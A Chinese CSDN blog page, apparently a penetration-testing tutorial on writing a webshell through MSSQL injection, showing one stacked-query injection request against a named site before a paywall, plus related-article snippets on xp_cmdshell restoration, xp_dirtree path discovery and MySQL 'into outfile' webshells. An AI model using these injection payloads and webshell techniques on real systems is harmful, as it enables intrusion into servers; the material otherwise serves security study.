mssql 获取网站绝对路径写shell

最新推荐文章于 2024-01-07 12:00:00 发布
最新推荐文章于 2024-01-07 12:00:00 发布
阅读量3.1k 收藏 1
点赞数 1
分类专栏: 红蓝对抗-攻防安全 文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38376348/article/details/107980136
版权

1 存在sql注入

创建表

GET /get.asp?act_id=52;create+table+gogotest+(tmp+varchar(1000));----&user_name=123 HTTP/1.1

Host: 360gongfang.com

Connection: close

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Sec-Fetch-Site: none

Sec-Fetch-Mode: navigate

Sec-Fetch-User: ?1

Sec-Fetch-Dest: document

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

Cookie: ASPSESSIONIDSCSRDDQC=EKFDMMLAFPMPKBFAPLIMPBKI

验证

了解本专栏 订阅专栏 解锁全文 超级会员免费看
Adsatrtgo
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
利用MSSQL getshell
浅笑996的博客
11-17 1万+
此次复现使用的sql server 2000 和sql server 2008两个环境进行的 是在已知数据库密码的基础上进行的 0x01 MSSQL连接 连接MSSQL 2000 新建连接: 填目的IP、目的端口、用户名、密码: 一直下一步,完成后,数据库导航窗口会出现一个连接,双击连接: 若是第一次连接,双击会提示下载驱动文件,若不成功,需多次反复尝试 新建SQL编辑器即可执行SQL语...
MSsqlL注入取得网站路径最好的方法.txt
07-18
MSsqlL注入取得网站路径最好的方法
MSSQL下拿WEBSEHLL
weixin_34381666的博客
11-28 106
2019独角兽企业重金招聘Python工程师标准>>> ...
【mssql实验】Mssqlgetshell
一剑开天门!的博客
03-07 1140
【mssql实验】Mssqlgetshell
SQL语句获取数据库文件全路径
yihuliunian的博客
04-13 3196
转载自品略图书馆http://www.pinlue.com/article/2018/09/1517/477196895458.html SQL语句获取数据库文件全路径 select filename from master.dbo.sysdatabases where name = @databasename 一些有用的系统存储过程及用法 ---------...
SQL Server从0到1——shell
最新发布
星星我啊,已经很努力在学习了, 有人一起学习吗?Ziansec-1
01-07 808
exec master.sys.sp_addextendedproc 'xp_cmdshell','C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll' 虽然是shell,但是xp_cmdshell更多的是用来提权,具体原因其实思考一下就明白了。接下来我们的思路就是创建一张临时表来接收命令执行返回的内容,然后我们在通过查临时表来获取数据。注意:如果xp_cmdshell被删除了,需要自己上传xplog70.dll进行恢复。
shell脚本连接、读、操作mysql数据库实例
09-10
shell脚本中操作MySQL数据库是一项常见的任务,尤其是在自动化运维和数据处理场景中。本文将详细介绍如何使用shell脚本连接MySQL数据库,并进行读操作。 首先,连接MySQL数据库通常使用`mysql`命令行工具。在...
C#中实现查找mysql的安装路径
09-03
获取了MySQL的基础目录之后,我们可以简单地添加“\\bin”来获取MySQL的`bin`目录路径,这对于运行MySQL命令行工具至关重要: ```csharp string strMysqlBinPath = GetMysqlPath() + "\\bin"; ``` 现在,`...
shell简单处理mysql查询结果的方法
09-09
今天小编就为大家分享一篇shell简单处理mysql查询结果的方法,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
python执行shell获取硬件参数入mysql的方法
09-10
在本文中,我们将深入探讨如何使用Python来执行shell命令获取硬件参数,并将这些信息入MySQL数据库。 首先,Python提供了多种方法来执行shell命令: 1. `os.system()`:此函数用于执行shell命令,并返回一个整数...
sql server附加数据库时显示绝对路径解决办法
04-17
解决sqlserver附加数据库显示句对路径的问题或附加不上数据库的问题。史上最好的解决办法,一分钟轻松解决。
shell一个mysql数据备份脚本
09-09
本文主要介绍如何使用shell脚本来实现MySQL数据库的自动备份,以及如何通过另一个脚本来定时清理旧的备份文件,以优化存储资源的使用。 首先,我们需要理解shell脚本的工作原理。Shell脚本是一种在Linux或Unix系统...
mysqlshell_基于mysql下的几种shell方法
weixin_35212670的博客
01-18 2919
0x00关于mysql下的shell方法网上基本很多了,我原本也没打算总结总结的,毕竟网上已经很多了,不过在看 kilon 大佬的博客的时候,给我的感受就是明明一个几句话的东西,总能详细的,有条有理的记录下来,所以也正是如此,才有了这篇文章。0x01利用条件数据库当前用户为root权限知道当前网站绝对路径PHP的GPC为 off状态入的那个路径存在入权限0x02基于联合查询法下的两个入方...
Mysqlshell的几种方式
Redredredfish的博客
08-23 7684
Mysqlshell的几种方式 当我们拿到数据库权限时,可通过数据库管理工具入webshell到目标服务器上,利用webshell控制目标服务器。 复现环境: phpstudy_pro 8.1.0.6 mysql 5.7.26 root权限 网站绝对路径为D:\phpstudy_pro\WWW 利用方式: 通过outfileshell 尝试通过outfile入文件 报错[Code: 1290, SQL State: HY000]The MySQL server is running with
MSsql注入取得网站路径最好的方法
dibodang1423的博客
05-16 977
好,我们exec master..xp_dirtree'd:/test'假设我们在test里有两个文件夹test1和test2在test1里又有test3结果显示subdirectory depthtest1 1test3 2test2 1 哈哈发现没有那个depth就是目录的级数ok了,知道怎么办了吧 http://www.xxxxx.com/down/list.asp?id=...
【知识整理】利用SQL语句shell的方法
命运的旋律的博客
03-22 3515
利用SQL语句shell的方法 要利用sqlshell就需要在配置中满足以下条件: 在mysql的配置文件my.ini中,secure_file_priv为空(被注释掉或不填)或者secure_file_priv配置是目录地址。 未开启全局GPC 关于mysql的secure_file_priv属性得多说几句 当secure_file_priv为空时,mysql对导入导出文件是没有限制的 ...
MySQL 一句话拿 WebShell
ShadowySpirits的博客
10-03 5106
本文介绍两种利用 MySQL getshell 的方法: select … into outfile general_log 一、select … into outfile 介绍 利用需要满足以下条件: 对web目录有权限 GPC关闭(能使用单引号) 有绝对路径(读文件可以不用,文件必须) 没有配置 –secure-file-priv 姿势: 有 union id=2) union...
【安全牛学习笔记】MSsqlL注入取得网站路径最好的方法
edu_aqniu的博客
10-31 2452
exec master..xp_dirtree'd:/test' 假设我们在test里有两个文件夹test1和test2在test1里又有test3 结果显示 subdirectory depth test1 1 test3 2 test2 1 哈哈发现没有那个depth就是目录的级数 ok了,知道怎么办了吧 http://www.xxxxx.com/down/list.
--os-shell
xhscxj的博客
09-27 497
启动sqlmap查看当前注入点数据库权限是否为True sqlmap-u “http://172.26.240.90/sqli-labs-master/Less-1/?id=1” --is-dba 通过–sql-shell寻找数据库绝对路径 sql-shell> select @@datadir; 通过数据库的位置我们可以知道一个大致的路径,并自己猜测当前站点的路径 常见的找绝对路径方法: 网页报错信息 phpinfo、探针 数据库查询、暴力破解 参看:常用的绝对路径收集 查看php是否开启魔术
mysql获取图片路径
05-31
如果你想在MySQL获取图片路径,你需要将图片路径存储在某个表的列中,并使用SELECT语句检索它们。 例如,假设你有一个名为“products”的表,其中包含产品的详细信息,包括产品图片的路径。你可以使用以下命令检索图片路径: ``` SELECT image_path FROM products WHERE product_id = 123; ``` 这将返回ID为123的产品的图片路径。然后,你可以在应用程序中使用这个路径来显示相应的图片。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值